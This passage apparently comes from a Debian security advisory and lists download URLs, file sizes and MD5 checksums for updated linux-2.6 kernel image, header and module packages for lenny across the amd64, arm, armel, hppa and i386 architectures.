http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 20912064 b2faa4db19ca1f9bad36db345004bd63 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 21064476 0480eeb89071e5773ca76697cc897edf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 3754412 81f809eb9d8703163a8d626f431af02e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 20894650 5866fb12c183a8a34421e58b69199a52 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 3721852 d964b38118d93b5d26675a73bbb600cb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 21064028 5d1655c4936c175e6a91355ab022a9b9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 389696 aa7b4b067f01db03132eb9d4d6d58091 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 391906 4f47f5cd839c41a1ab4c7b2f54cd0f2c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 395926 ea1253cda840d49d41e13702efbed02a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 108548 c92d21172898d445763a4d8fd05cbe0d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 108734 3587ae10e018dd195d218d3a124bd06f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 19276528 eea793d5e6bc477da5633dd90ab68a80 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 397146 5d1ac382c997a823a0a003dcb3ba2070 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 20894254 a4085dc5c64b1c9248a5063d01195fcd http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 108534 70aaa46a803e0e0359f62572d9c3fd47 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 20912152 1cfacd064cda0fa03a64985f9fa93ff4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 3854086 577d66e2d5ad76a18100929016adb4b9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 3754410 a6271de66c96f5a97cd4e355da812069 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 389496 9464058c967a225f838a9fad0aab3612 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 1807208 cf864e620211634cacb9fe349da96e67

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 749514 1b7b54fc5a3c088408fcadb17eced0bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 362960 e996c77f5d49a6f216b71a9449a55b30 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 108748 6fd11cf124041f35486898948bcd345a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 363278 965b088ffa539bc9b7437963832c4c55 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 11720320 f23ec924b931ed33227f3e3b0e017b0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 350880 836aa5293823be9983382878a706b11c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 108786 eec5ef010eb4d265862730eea462735d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 12454778 d61744348179cd47e3ea948126aad499 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 108642 0409de8db98786b9cc98fa78491188d9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 11422168 0a738e9c8a223035938587231ab29be0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 351962 778ef245efcc634d56f25afa60a4880b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 12447084 9ce402f2d3f9231155657e2c10f33510 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 365886 ee6bc34915a84fc025fcc7ce105d1888 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 4142286 2493399a50d78a16f1946bf572409cd8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 748962 b2b554707ecd14c922ac5e0bc812bf2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 11410256 f34c33699b5aa8c80f4d2cdf27f43d98 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 10241948 f6d25d1eee96031b8b0203d0e7711b1d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 11728562 9c14add2ef000e7b62c52e7e2b2d8682 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 365840 50aa3ef4b64c3bda32171c302e468e80 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 368962 b8e3d95e9da32e61398e2b481ea85259 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 4138498 7b4f0bf9d70d63d22aa04fd72de9071f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb Size/MD5 checksum: 10253486 07767d4f8e4f038738d9dae099a5e27c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 108596 ee087da9b5e9314d94728c173079d128 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb Size/MD5 checksum: 368146 ac75a805d9a76f9f28fec550f1b3ff62

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 12400530 761c33f67bbe6616cab21192e4256df5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 11377936 b692b4724667bfc12aa8e80cac8723f8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 11688238 06544e3ce8794e071fc873a2cc1b4e27 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 9581042 37b21f42a1ee2256f9aa17c092738a61 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 364802 ed63e7a262130ef9bd8711f73152f06f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 368672 4447fc56fa6118d87ad47a721e5bf793 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 337618 3b21371c9423d38e5031724464d01950 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 749306 4361179f0f5572d5b56a7747c3547512 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 749706 acbe317294eeca0f43da9211b726817e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 4134366 d9461c790b30d017090e74e97f5a3325 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 108712 7a9cc05416f6c06bdd8f388cc3c0c5f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 108462 7e7adfb769f8cb5b1f48ecf2f5c15ea3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 367112 08975a13584af0230b8e592686573d64 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 108744 8d645205e1ef21e2759df33d39227a28 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 361902 a389f0082ce6653e7b2a08168787887d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 9583098 6acf27fb79f8ddd46f42ff81cb91ea14 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 365012 b7b78539a5da9ef226af3bd8c00f4a27 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb Size/MD5 checksum: 12408468 a9aa31723c34fd0d7c668ce06afa49df http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 367392 c18589de88fbff8bf744b2082fbd0d21 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 11373712 a8136ebb88c293b538afd2227605665d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 336788 ca9ea27ae187f347ce1f917708338374 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 11682376 96c874e9988ecfe3bf29ab87a59bc800 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 4138826 9c36123a7336f66315eb00d38455b364 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb Size/MD5 checksum: 108502 c3d8036a8945c598bc45d9703b6b033e

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 16329288 5218a1a4f278d7b57b15c28b8484d14b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 16329740 c5cdc0e069cb6ede4e78bbde3c1c9d38 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 298428 0a9230bddf14ff72e72f5f8364a7065b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 17065708 68733ed99b8bf117045e91993d3e34e1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 760596 c7073dae32f1da80546996f9be99dc4b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 17606836 e6b141686e83c8e87708eb32ba5f765b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 17064682 6ee4beb8ddc3ec65d2e44ef2abc52711 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 108774 dcaac67bb66ab3993c236e0c39cbc863 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 3602414 5ae801276f46a79329e53e9b6f7ae5c8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 300986 eeeab86991aa8d4d2570d7d1efe7e0c1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 15732620 4142cd60023a49fc5cba7e524a0e677e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 300704 247bcb4b71e6d7fea75987dcddbfb843 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 299420 d976a36fe5f633475bf2c0c06ef10b43 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 301474 c0ee7622dd755b3b5fece4fab4814b37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 301264 f3ebd75938c150e31532d22957cae48a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 108592 caa307b157d81c1b02d2ad0c0f342fcb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 298662 afdc4001e99590a38eff17434f8dbf6e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 108624 7fdd70b403b07234c57272a5956c7637 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 760622 dc5b55d7cd8aec6cac4f4de8d3908138 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 108748 8231281dd48d07f51a6c76cae28b03b6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 17607646 3fbc0828d0dc3c8730bebd789cf6a99c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 15734148 24cb2bcfc207fe3b0fa5063c043e0485 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb Size/MD5 checksum: 3602208 9faa4dde7cf95d0eceb8173b0797bab4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb Size/MD5 checksum: 301262 5585e2c5657f24afec825d9c48069afb

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 400552 f0ab806af132585894a0b4d488f681e1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20182002 68bf490913715a3a4893a0f3030fd08a http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 108698 05e475352e3e9e7f7ca058b02da5e596 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 395282 9ca23e9ea72d7267547488df93ed3891 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 751496 4bb4db205fe5a3e5b08a2f96ef535dae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20512122 404f343a28b757905e08c4ed06938025 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 414984 17003e8c4d69f33f139d0b838253296f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 3754214 c13bbf441f92bd7e5d443bcc120056bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 3804582 0703c8ce4817e2691bd967eb2a1e2aaa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20309414 e71604df8f47dbe29e4eb480d523dcf4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 406794 2363770c63d9f8466ccd7d705b0f52c2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 3854214 9aa41ff3e4c1dd59cd75c504ad138251 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20369630 e8bd60ec3f9da0fadbb042abaf36c139 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 406598 acdc58c26d377b6dd5875734aa065ac0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20335314 dcb229f6502f1917863bced44e26415e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 18044830 1ec4594316ac2f6b6fae6aabaa9b2375 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20875430 71438d596864b15028d568cfc15086d8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 3721614 7fc667d57644e72926ad94679040808f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20242322 bb675ba8ac183757940fc2f9a38cff3f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 3777298 7bc44c56c67d7347d1d14b33969d43d0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 18043878 bd5cc921dc8b99aee2349949b268742d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 400030 5cf9b3313efc0353d53270ff6c810b52 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 407430 a0005c58b226ce7a2c6cbd32c52e4707 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 108652 125393b32f78a83b5487f86609caef9c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20242572 21545fdd42b8b74a9d76a5fdefff5d71 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 108470 39f81b9bc97be71c303134ea39d39668 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 108760 ff55bc8837a8e5d3f1c9f846c3b49df8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 3863030 f60938819e03e8dc8dcfa4998c02acd2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20465042 23bc3025baf8c3fc11cfd182d928a16e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20979960 77e4935a71746ca71a48a6fec79aace8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 407034 d2671fbd82a221a68c7ddaba28e770cc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 399662 054c4c2158e54a5e340aa61bf79c8621 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 108586 b9d0b66a7f7d3cd72220a28b1a16e3db http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 400428 d166f07671c10db0e501e005d59c0dbe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20217898 fa4b16b6a046746c752edaa45fd4fc64 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20640882 06e18bca999a2c1e460259b6c4682aa3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20875948 baba9d22a44a1ee0814f7acd950727e1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 108596 9a34da9105c07f3fd7caaafa38fd4a09 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 108418 85098acb63d71b952a5e2bec67315522 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 389694 403c43df5849b1b00101dcd77a0ffa27 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 18160862 f7852726d5fb05ce76e3ce406ca491ae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 400640 a46d929bd03a31d8455057852186cf04 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 3777542 b3a9d9c191efecc4ebdead63e0e1a1b6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20335320 c257003a37486c77eb7236b74a1d5bc4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 108706 80501c6c7b452434f9afccea416b709f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 3754468 1eb8fcf5397026e02228ad5896598f44 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 1594926 2405c55c21f13bacecfec840c81216fe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 751384 c150bf84cf8b4f41309bb353d6e0f0ea http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 387262 0b501ef2dd8f259e336c70bfac6db9a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 400902 031d09121cb1b04cf75fcc7fb1fa4925 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 108414 b9cc53f856782ac942ca3b98ece340e0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20182500 d4dc224037d71e76f7ed3878f3aa9630 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20341764 e59a069f5d07703913f9488cf2c17021 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 3721846 229b2c54999ea5a7e3679bf5f4a2d473 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 765918 d172b7dcad29aa4ee04def9a221d6fba http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 400638 9612c907573cf5785e91bdd309c97ab4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20217866 cd265b0c5c7940df3723df5b1e6b8a0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 408114 33446a9ba1aaf26565b86dcd7991310c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 408332 e7b92f9c7e2281e2050156a126481d0b 